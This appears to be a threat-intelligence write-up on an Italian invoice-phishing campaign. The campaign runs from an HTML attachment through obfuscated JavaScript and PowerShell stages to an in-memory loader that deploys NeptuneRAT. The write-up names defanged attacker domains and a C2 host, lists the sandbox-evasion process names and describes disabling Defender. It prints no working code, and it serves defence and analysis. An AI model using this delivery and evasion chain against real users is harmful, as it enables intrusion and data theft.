Since February 2026, we have been tracking an invoice-themed malware campaign targeting Italian users and organizations. The messages are written in Italian and abuse a familiar business pretext: a short invoice notification that asks the recipient to open an attached HTML document. The lure is minimal, credible enough for a busy inbox, and designed to move the victim from email to browser to script execution.

One of the analyzed emails used the subject Nostra fattura nr. 91B. The body asked the recipient to review the attached document to view invoice details. The attachment was named Fattura_00121.html.

The attached HTML file is intentionally small. It redirects the browser to a phishing page hosted at https://pillarsesolution[.]com/i#..., where the URL fragment contains the recipient’s email address encoded in Base64. This identifier is likely used by the threat actor to track victims and store, in a dropzone, the email addresses of users who reached the phishing page and proceeded to download the malicious ZIP package.

The landing page presents a polished download interface in Italian. It tells the user that the document is ready, displays Fattura_00121.pdf, marks it as protected, and invites the user to click Scarica File. This visual layer is important: the malware does not rely only on attachment execution, but on making the transition from email to download feel routine.

When the victim clicks the download button, the page reaches https://bonanza.davidsabido[.]com/wp-includes/images/ic/i.php. The server-side logic appears to gate delivery by user agent. Windows browser user agents receive a ZIP archive, while non-Windows or unsuitable clients are redirected to a generic PDF hosted on Google Drive. This split helps the campaign look less suspicious during casual inspection and avoids delivering the Windows payload to environments unlikely to execute it.

In the last analyzed case, the ZIP archive was B00225511855210021-00551.zip and contained a heavily obfuscated JavaScript file named B00225511855210021-00551.js. Opening the JavaScript starts the real infection chain through Windows Script Host. The script builds and launches a PowerShell command with execution policy bypass, then drops and executes additional PowerShell stages under C:\Users\Public.

The first decoded PowerShell stage checks connectivity against www.google.com, flushes DNS cache, disables or weakens Windows Defender settings, and looks for analysis tools. The anti-analysis process list includes names such as handle, autorunsc, Dbgview, tcpvcon, any.run, sandbox, tcpview, OLLYDBG, ImmunityDebugger, Wireshark, apateDNS, and analyze. If the environment looks suspicious, execution may stop or the host may be restarted.

After these checks, the malware downloads 03.txt from a meusitehostgator[.]com[.]br domain. The downloaded data is parsed after a %x% marker and reconstructed as a .NET loader, ClassLibrary3, which is loaded directly in memory via PowerShell reflection. This behavior matches public reporting on UpCrypter campaigns: JavaScript and PowerShell act as staging layers, while an MSIL loader prepares and deploys the final payload.

The final PowerShell stage, sgyof.ps1, was recovered from Joe Sandbox. It is a UTF-16LE PowerShell file containing a large byte array. That byte array loads a .NET assembly in memory through [System.Reflection.Assembly]::Load(...) and invokes ClassLibrary1.Class1.Run(...). The embedded assembly contains RunPE functionality and a nested .NET executable.

Extracting the nested executable revealed the final payload. It is a .NET GUI executable internally identified as MasonClient.exe. Its strings include MasonRAT, MasonGroup, NeptuneRAT V5.3, and the C2 configuration afxwd[.]ddns[.]net:143. This indicates that UpCrypter is the delivery and loading framework, while the malware deployed in this case is NeptuneRAT, also labelled MasonRAT by its own configuration.

The sandbox behavior supports this conclusion. Joe Sandbox captured sgyof.ps1 as a dropped file and detected NeptuneRAT in PowerShell memory dumps and unpacked PE artifacts. Other sandboxes stopped earlier in the chain, likely because the loader checks for analysis environments and specifically includes sandbox-related process names. This explains why some environments observed only gdwfw.txt, tpkws.txt, or np.txt, while Joe Sandbox progressed far enough to recover the final PowerShell stage.

For defenders, the user-facing lesson is simple: an HTML attachment that immediately redirects to a document download page should be treated as hostile, especially when the email uses generic invoice language and high-priority headers. For analysts, the important point is that the campaign is not a single malware family from the first stage onward. It is a layered delivery chain where UpCrypter stages and executes a final RAT payload.

Indicators of Compromise

URLs and domains

Files and hashes

Host artifacts